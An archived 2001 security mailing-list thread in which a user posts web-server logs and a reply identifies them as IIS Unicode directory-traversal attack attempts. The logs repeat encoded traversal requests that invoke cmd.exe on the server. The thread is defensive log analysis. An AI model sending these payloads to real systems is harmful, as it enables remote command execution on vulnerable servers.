[Dshield] win32 exploit?

Kenneth McKinlay km-web at home.com
Fri Aug 3 22:32:35 GMT 2001


Joseph,

At least some of the log entries appears to be examples of the 
"Microsoft IIS and PWS Extended Unicode Directory Traversal 
Vulnerability". Details can be found at 
http://www.securityfocus.com/bid/1806. 

To quote from that page: "Microsoft IIS 4.0 and 5.0 are both 
vulnerable to double dot "../" directory traversal exploitation if 
extended UNICODE character representations are used in substitution 
for "/" and "\". "

Hope this helps.

Ken McKinlay, GCIA
Ottawa, Canada



From:           	Joseph Shraibman <jks at selectacast.net>
Organization:   	Xtenit, Inc. http://www.xtenit.com
To:             	"dshield at dshield.org" <dshield at dshield.org>
Subject:        	[Dshield] win32 exploit?
Send reply to:  	dshield at dshield.org
	<mailto:dshield-request at dshield.org?subject=subscribe>
	<mailto:dshield-request at dshield.org?subject=unsubscribe>
Date sent:      	Fri, 03 Aug 2001 14:02:12 -0400

> Does anyone know what this is?
> 
> 216.26.139.35 - - [03/Aug/2001:13:24:59 -0400] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir" 200 201 "-" "-"
> 
> [31/Jul/2001:21:45:41 -0400] "GET
> /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -
> bogus_host_without_reverse_dns 207.213.220.70 - -
> [06/Apr/2001:22:21:26 -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0
> %af/winnt/system32/cmd.exe?/c%20dir HTTP/1.0" 404 344
> bogus_host_without_reverse_dns 128.121.2.139 - - [16/Jun/2001:18:14:33
> -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0
> %af/winnt/system32/cmd.exe?/c%20dir HTTP/1.0" 404 - error_log:[Fri Apr
>  6 22:21:26 2001] [error] [client 207.213.220.70] File does not exist:
> /local/www/apps253/bogus_host_without_reverse_dns/scripts/..À¯..À¯..À¯
> ..À¯..À¯..À¯..À¯..À¯/winnt/system32/cmd.exe error_log:[Sat Jun 16
> 18:14:33 2001] [error] [client 128.121.2.139] File does not exist:
> /local/www/apps253/bogus_host_without_reverse_dns/scripts/..À¯..À¯..À¯
> ..À¯..À¯..À¯..À¯..À¯/winnt/system32/cmd.exe error_log:[Sat Jul  7
> 23:57:50 2001] [error] [client 216.198.90.30] File does not exist:
> /local/www/apps253/apps/scripts/..Á?../winnt/system32/cmd.exe
> error_log:[Tue Jul 31 21:45:41 2001] [error] [client 61.151.231.33]
> File does not exist:
> /local/www/apps253/apps/scripts/..%5c%5c../winnt/system32/cmd.exe
> 207.213.220.70 - - [06/Apr/2001:22:21:26 -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0
> %af/winnt/system32/cmd.exe?/c%20dir HTTP/1.0" 404 332 128.121.2.139 -
> - [16/Jun/2001:18:14:33 -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0
> %af/winnt/system32/cmd.exe?/c%20dir HTTP/1.0" 404 332 216.198.90.30 -
> - [07/Jul/2001:23:57:50 -0400] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir" 404 - 61.151.231.33
> - - [31/Jul/2001:21:45:41 -0400] "GET
> /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -
> 207.213.220.70 - - [06/Apr/2001:22:21:26 -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0
> %af/winnt/system32/cmd.exe?/c%20dir HTTP/1.0" 404 332 "-" "-"
> 128.121.2.139 - - [16/Jun/2001:18:14:33 -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0
> %af/winnt/system32/cmd.exe?/c%20dir HTTP/1.0" 404 332 "-" "-"
> 216.198.90.30 - - [07/Jul/2001:23:57:50 -0400] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir" 404 - "-" "-"
> 61.151.231.33 - - [31/Jul/2001:21:45:41 -0400] "GET
> /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 - "-" "-"
> [Fri Apr  6 22:21:26 2001] [error] [client 207.213.220.70] File does
> not exist:
> /local/www/virtual/www.xtenit.com/scripts/..À¯..À¯..À¯..À¯..À¯..À¯..À¯
> ..À¯/winnt/system32/cmd.exe [Sat Jun 16 18:14:33 2001] [error] [client
> 128.121.2.139] File does not exist:
> /local/www/virtual/www.xtenit.com/scripts/..À¯..À¯..À¯..À¯..À¯..À¯..À¯
> ..À¯/winnt/system32/cmd.exe [Sat Jul  7 23:57:50 2001] [error] [client
> 216.198.90.30] File does not exist:
> /local/www/virtual/www.xtenit.com/scripts/..Á?../winnt/system32/cmd.ex
> e [Tue Jul 31 21:45:41 2001] [error] [client 61.151.231.33] File does
> not exist:
> /local/www/virtual/www.xtenit.com/scripts/..%5c%5c../winnt/system32/cm
> d.exe 207.213.220.70 - - [06/Apr/2001:22:21:26 -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0
> %af/winnt/system32/cmd.exe?/c%20dir HTTP/1.0" 404 328 128.121.2.139 -
> - [16/Jun/2001:18:14:33 -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0
> %af/winnt/system32/cmd.exe?/c%20dir HTTP/1.0" 404 328 216.198.90.30 -
> - [07/Jul/2001:23:57:50 -0400] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir" 404 - 61.151.231.33
> - - [31/Jul/2001:21:45:41 -0400] "GET
> /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -
> 207.213.220.70 - - [06/Apr/2001:22:21:26 -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0
> %af/winnt/system32/cmd.exe?/c%20dir HTTP/1.0" 404 328 "-" "-"
> 128.121.2.139 - - [16/Jun/2001:18:14:33 -0400] "GET
> /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0
> %af/winnt/system32/cmd.exe?/c%20dir HTTP/1.0" 404 328 "-" "-"
> 216.198.90.30 - - [07/Jul/2001:23:57:50 -0400] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir" 404 - "-" "-"
> 61.151.231.33 - - [31/Jul/2001:21:45:41 -0400] "GET
> /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 - "-" "-"
> [Fri Apr  6 22:21:26 2001] [error] [client 207.213.220.70] File does
> not exist:
> /local/www/virtual/www.xtenit.com/scripts/..À¯..À¯..À¯..À¯..À¯..À¯..À¯
> ..À¯/winnt/system32/cmd.exe [Sat Jun 16 18:14:33 2001] [error] [client
> 128.121.2.139] File does not exist:
> /local/www/virtual/www.xtenit.com/scripts/..À¯..À¯..À¯..À¯..À¯..À¯..À¯
> ..À¯/winnt/system32/cmd.exe [Sat Jul  7 23:57:50 2001] [error] [client
> 216.198.90.30] File does not exist:
> /local/www/virtual/www.xtenit.com/scripts/..Á?../winnt/system32/cmd.ex
> e [Tue Jul 31 21:45:41 2001] [error] [client 61.151.231.33] File does
> not exist:
> /local/www/virtual/www.xtenit.com/scripts/..%5c%5c../winnt/system32/cm
> d.exe
> 
> 
> -- 
> Joseph Shraibman
> jks at selectacast.net
> Increase signal to noise ratio.  http://www.targabot.com
> 
> _______________________________________________
> Dshield mailing list
> Dshield at dshield.org
> To change your subscription options (or unsubscribe), see:
> http://www1.dshield.org/mailman/listinfo/dshield





More information about the list mailing list